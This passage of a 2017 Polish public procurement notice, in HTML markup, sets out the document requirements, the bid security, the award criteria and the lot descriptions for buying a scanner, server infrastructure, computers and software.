                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1.	zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
2.	zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
3.	odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy;
4.	Zamawiający żąda od Wykonawcy, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy, przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w pkt. 1-3.</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />wykazu dostaw wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz, których dostawy zostały wykonane, oraz załączeniem dowodów określających czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie Wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert (wzór wykazu w załącznik nr 2d do SIWZ)  dotyczy Wykonawców składających ofertę w Części 2 i/lub w Części 3 i/lub w Części5;<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">1.	karty katalogowe, opisy lub inne podobne materiały, potwierdzające spełnienie minimalnych parametrów sprzętu / oprogramowania stanowiącego przedmiot zamówienia, wraz z podaniem nazw oferowanego sprzętu / oprogramowania;
2.	wydruk lub kopia certyfikatu lub innego dokumentu wydanego przez producenta systemu operacyjnego, potwierdzający poprawną współpracę oferowanych modeli komputerów z zainstalowanym systemem komputerowym (dotyczy Wykonawców składających ofertę w Części 2 i/lub w Części 3);
3.	wydruk ze strony www.cpubenchmark.net potwierdzający wynik dla oferowanego procesora (dotyczy Wykonawców składających ofertę w Części 2 i/lub w Części 3);
4.	wydruk ze strony www.cpubenchmark.net potwierdzający wynik dla oferowanej karty graficznej  (dotyczy Wykonawców składających ofertę w Części 3).
UWAGA! Zamawiający dopuszcza złożenie dokumentów, o których mowa w ppkt. 3-4 w języku angielskim.
</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1.	Do oferty Wykonawca zobowiązany jest dołączyć:
1.1.	Formularz oferty przygotowany zgodnie ze wzorem podanym w Załączniku nr 1 do SIWZ;
1.2.	aktualne na dzień składania ofert oświadczenia stanowiące wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu (wzór oświadczeń w Załącznikach nr 2a i 2b do SIWZ);
1.3.	pełnomocnictwo do podpisania oferty, oświadczeń i dokumentów składających się na ofertę, o ile upoważnienie to nie wynika z innych dokumentów dołączonych do oferty. Pełnomocnictwo należy złożyć w formie oryginału lub kserokopii poświadczonej notarialnie za zgodność z oryginałem;
1.4.	dowód wniesienia wadium w sytuacji, gdy wadium jest wnoszone w innej formie niż pieniądz (dotyczy Wykonawców składających ofertę w Części 2 i/lub w Części 3 i/lub w Części 5);
2.	Wykonawca, w terminie 3 dni od zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 uPzp, przekazuje Zamawiającemu oświadczenie o przynależności albo braku przynależności do tej samej grupy kapitałowej (wzór oświadczenia w Załączniku nr 2c do SIWZ). W przypadku przynależności do tej samej grupy kapitałowej Wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.	W przypadku Wykonawców składających ofertę łącznie w Części 2, w Części 3 oraz w Części 5 oferta musi być zabezpieczona wadium w wysokości: 3.200,00 (słownie: trzy tysiące dwieście) złotych, lub:
1.1.	w przypadku Wykonawców składających ofertę w Części 2  1.300,00 (słownie: jeden tysiąc trzysta) złotych;
1.2.	w przypadku Wykonawców składających ofertę w Części 3  400,00 (słownie: czterysta) złotych
1.3.	w przypadku Wykonawców składających ofertę w Części 5  1.500,00 (słownie: jeden tysiąc pięćset) złotych.
2.	Wadium należy wnieść przed upływem terminu składania ofert. 
3.	Wadium może być wniesione w następujących formach:
3.1.	w pieniądzu  przelewem na rachunek bankowy Zamawiającego wskazany w Rozdziale 1, pkt 4 ppkt 4.7. SIWZ z zaznaczeniem wadium  DP/PN/04/2017,
3.2.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym  gwarantowane na okres minimum 30 dni licząc od ostatecznego terminu składania ofert,
3.3.	gwarancjach bankowych  gwarantowane na okres minimum 30 dni licząc od ostatecznego terminu składania ofert,
3.4.	gwarancjach ubezpieczeniowych  gwarantowane na okres minimum 30 dni licząc od ostatecznego terminu składania ofert,
3.5.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2014 r. poz. 1804 oraz z 2015 r. poz. 978 i 1240).
UWAGA: Zamawiający nie dopuszcza wniesienia wadium w formie innej niż jedna z wyżej wymienionych.
4.	W przypadku wnoszenia wadium w gwarancjach bankowych lub ubezpieczeniowych gwarancje muszą być nieodwołalne oraz zawierać zapis o bezwarunkowej wypłacie kwoty gwarancyjnej na pierwsze pisemne żądanie Zamawiającego jako beneficjenta gwarancji oraz uwzględniać przesłanki określone art. 46 ust. 4a oraz art. 46 ust. 5 uPzp.
5.	W przypadku wnoszenia wadium przelewem na rachunek bankowy, o jego wniesieniu w terminie decydować będzie data i godzina wpływu środków na rachunek bankowy Zamawiającego.
6.	W przypadku Wykonawców składających ofertę w Części 1 i/lub w Części 4 Zamawiający nie wymaga wniesienia wadium.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin realizacji</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.	Wszelkie zmiany i uzupełnienia umowy mogą być dokonywane za zgodą obu stron wyrażoną w formie pisemnej w postaci aneksu, pod rygorem nieważności.
2.	Zamawiający dopuszcza możliwość zmiany postanowień umowy w przypadku zmiany organizacyjnej po stronie Wykonawcy polegającej na zmianie adresu siedziby firmy, siedziby serwisu bądź zmiany adresu zamieszkania właściciela lub współwłaściciela firmy.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 12/04/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Oferta powinna być sporządzona w języku polskim. Dokumenty sporządzone w języku obcym powinny zostać złożone wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę. Zamawiający dopuszcza złożenie dokumentów, o których mowa w Rozdziale 6, pkt 2, ppkt. 2.3-2.4 SIWZ (pkt III.6, ppkt 3 i 4 niniejszego ogłoszenia) w języku angielskim.<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Część 1<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część 1   Urządzenia skanujące:
a)	skaner płaski  1 szt.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>30200000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 30<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin realizacji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>1.	Ocena końcowa jest sumą punktów uzyskanych w powyższych kryteriach. Zamawiający udzieli zamówienia Wykonawcy, którego oferta została uznana za najkorzystniejszą, w oparciu o wyżej wymienione kryteria.
2.	Liczba punktów zostanie wyliczona z dokładnością do dwóch miejsc po przecinku. 
3.	Maksymalna ilość punktów, jaką łącznie może otrzymać oferta to 100. Liczba punktów zostanie wyliczona z dokładnością do dwóch miejsc po przecinku.
4.	Ocena ofert w kryterium Cena ( C ).
Zamawiający przyporządkuje najkorzystniejszej, czyli najniższej cenie, maksymalną liczbę punktów, tj. 60. Każdej następnej ofercie, Zamawiający przyporządkuje liczbę punktów proporcjonalnie mniejszą, stosując wzór:
C=	(cena najniższa	/cena oferty badanej) x 100 x 0,60 
5.	Ocena ofert w kryterium termin realizacji ( T )
Zamawiający przyzna poszczególnym ofertom punktację na podstawie wskazanego przez Wykonawcę w Formularzu oferty terminu realizacji, wg. poniższej punktacji:
5.1.	termin realizacji do 15 dni roboczych	  40 pkt;
5.2.	termin realizacji do 20 dni roboczych	  30 pkt;
5.3.	termin realizacji do 25 dni roboczych	  20 pkt;
5.4.	termin realizacji do 30 dni roboczych	  0 pkt.
Termin realizacji do 30 dni roboczych jest terminem maksymalnym. W przypadku, gdy Wykonawca nie wskaże w Formularzu oferty terminu realizacji, Zamawiający przyjmie do oceny oferty Wykonawcy termin realizacji do 30 dni roboczych.
<br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Część 2<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część 2   infrastruktura informatyczna do masowego przechowywania i przenoszenia danych wraz z oprogramowaniem: 
a)	serwer  1 szt. 
	oprogramowanie do obsługi serwera  1 licencja,
	oprogramowanie do obsługi serwera, system operacyjny - 1 licencja,
b)	macierz dyskowa z dyskami  1 komplet;
c)	switch z obudową  1 szt.;
d)	szafa rack  1 szt.;
e)	dyski do przenoszenia danych  4 szt.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>30200000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 30<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin realizacji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>1.	Ocena końcowa jest sumą punktów uzyskanych w powyższych kryteriach. Zamawiający udzieli zamówienia Wykonawcy, którego oferta została uznana za najkorzystniejszą, w oparciu o wyżej wymienione kryteria.
2.	Liczba punktów zostanie wyliczona z dokładnością do dwóch miejsc po przecinku. 
3.	Maksymalna ilość punktów, jaką łącznie może otrzymać oferta to 100. Liczba punktów zostanie wyliczona z dokładnością do dwóch miejsc po przecinku.
4.	Ocena ofert w kryterium Cena ( C ).
Zamawiający przyporządkuje najkorzystniejszej, czyli najniższej cenie, maksymalną liczbę punktów, tj. 60. Każdej następnej ofercie, Zamawiający przyporządkuje liczbę punktów proporcjonalnie mniejszą, stosując wzór:
C=	(cena najniższa	/cena oferty badanej) x 100 x 0,60 
5.	Ocena ofert w kryterium termin realizacji ( T )
Zamawiający przyzna poszczególnym ofertom punktację na podstawie wskazanego przez Wykonawcę w Formularzu oferty terminu realizacji, wg. poniższej punktacji:
5.1.	termin realizacji do 15 dni roboczych	  40 pkt;
5.2.	termin realizacji do 20 dni roboczych	  30 pkt;
5.3.	termin realizacji do 25 dni roboczych	  20 pkt;
5.4.	termin realizacji do 30 dni roboczych	  0 pkt.
Termin realizacji do 30 dni roboczych jest terminem maksymalnym. W przypadku, gdy Wykonawca nie wskaże w Formularzu oferty terminu realizacji, Zamawiający przyjmie do oceny oferty Wykonawcy termin realizacji do 30 dni roboczych.
<br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Część 3<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część 3   sprzęt komputerowy (2 zestawy)  wraz z oprogramowaniem - system operacyjny:
a)	sprzęt komputerowy dla administratora  1 kpl., 
	oprogramowanie do obsługi sprzętu komputerowego - system operacyjny dla administratora (licencja bezterminowa) 1 szt.;
b)	sprzęt komputerowy do czytelni  1 kpl.,
	oprogramowanie do obsługi sprzętu komputerowego - system operacyjny dla czytelni (licencja bezterminowa) 1 szt.;
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>30200000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 30<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin realizacji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>1.	Ocena końcowa jest sumą punktów uzyskanych w powyższych kryteriach. Zamawiający udzieli zamówienia Wykonawcy, którego oferta została uznana za najkorzystniejszą, w oparciu o wyżej wymienione kryteria.
2.	Liczba punktów zostanie wyliczona z dokładnością do dwóch miejsc po przecinku. 
3.	Maksymalna ilość punktów, jaką łącznie może otrzymać oferta to 100. Liczba punktów zostanie wyliczona z dokładnością do dwóch miejsc po przecinku.
4.	Ocena ofert w kryterium Cena ( C ).
Zamawiający przyporządkuje najkorzystniejszej, czyli najniższej cenie, maksymalną liczbę punktów, tj. 60. Każdej następnej ofercie, Zamawiający przyporządkuje liczbę punktów proporcjonalnie mniejszą, stosując wzór:
C=	(cena najniższa	/cena oferty badanej) x 100 x 0,60 
5.	Ocena ofert w kryterium termin realizacji ( T )
Zamawiający przyzna poszczególnym ofertom punktację na podstawie wskazanego przez Wykonawcę w Formularzu oferty terminu realizacji, wg. poniższej punktacji:
5.1.	termin realizacji do 15 dni roboczych	  40 pkt;
5.2.	termin realizacji do 20 dni roboczych	  30 pkt;
5.3.	termin realizacji do 25 dni roboczych	  20 pkt;
5.4.	termin realizacji do 30 dni roboczych	  0 pkt.
Termin realizacji do 30 dni roboczych jest terminem maksymalnym. W przypadku, gdy Wykonawca nie wskaże w Formularzu oferty terminu realizacji, Zamawiający przyjmie do oceny oferty Wykonawcy termin realizacji do 30 dni roboczych.
<br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Część 4<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>4.	Część 4  oprogramowanie użytkowe:
a)	oprogramowanie biurowe do komputera dla administratora (licencja)  1 szt.;
b)	oprogramowanie biurowe do komputera do czytelni (licencja)  1 szt.;
c)	oprogramowanie do obróbki zdjęć dla administratora (licencja)  1 szt.;
d)	oprogramowanie do tworzenia grafiki dla administratora (program)  1 szt.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>30200000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 30<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin realizacji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>1.	Ocena końcowa jest sumą punktów uzyskanych w powyższych kryteriach. Zamawiający udzieli zamówienia Wykonawcy, którego oferta została uznana za najkorzystniejszą, w oparciu o wyżej wymienione kryteria.
2.	Liczba punktów zostanie wyliczona z dokładnością do dwóch miejsc po przecinku. 
3.	Maksymalna ilość punktów, jaką łącznie może otrzymać oferta to 100. Liczba punktów zostanie wyliczona z dokładnością do dwóch miejsc po przecinku.
4.	Ocena ofert w kryterium Cena ( C ).
Zamawiający przyporządkuje najkorzystniejszej, czyli najniższej cenie, maksymalną liczbę punktów, tj. 60. Każdej następnej ofercie, Zamawiający przyporządkuje liczbę punktów proporcjonalnie mniejszą, stosując wzór:
C=	(cena najniższa	/cena oferty badanej) x 100 x 0,60 
5.	Ocena ofert w kryterium termin realizacji ( T )
Zamawiający przyzna poszczególnym ofertom punktację na podstawie wskazanego przez Wykonawcę w Formularzu oferty terminu realizacji, wg. poniższej punktacji:
5.1.	termin realizacji do 15 dni roboczych	  40 pkt;
5.2.	termin realizacji do 20 dni roboczych	  30 pkt;
5.3.	termin realizacji do 25 dni roboczych	  20 pkt;
5.4.	termin realizacji do 30 dni roboczych	  0 pkt.
Termin realizacji do 30 dni roboczych jest terminem maksymalnym. W przypadku, gdy Wykonawca nie wskaże w Formularzu oferty terminu realizacji, Zamawiający przyjmie do oceny oferty Wykonawcy termin realizacji do 30 dni roboczych.
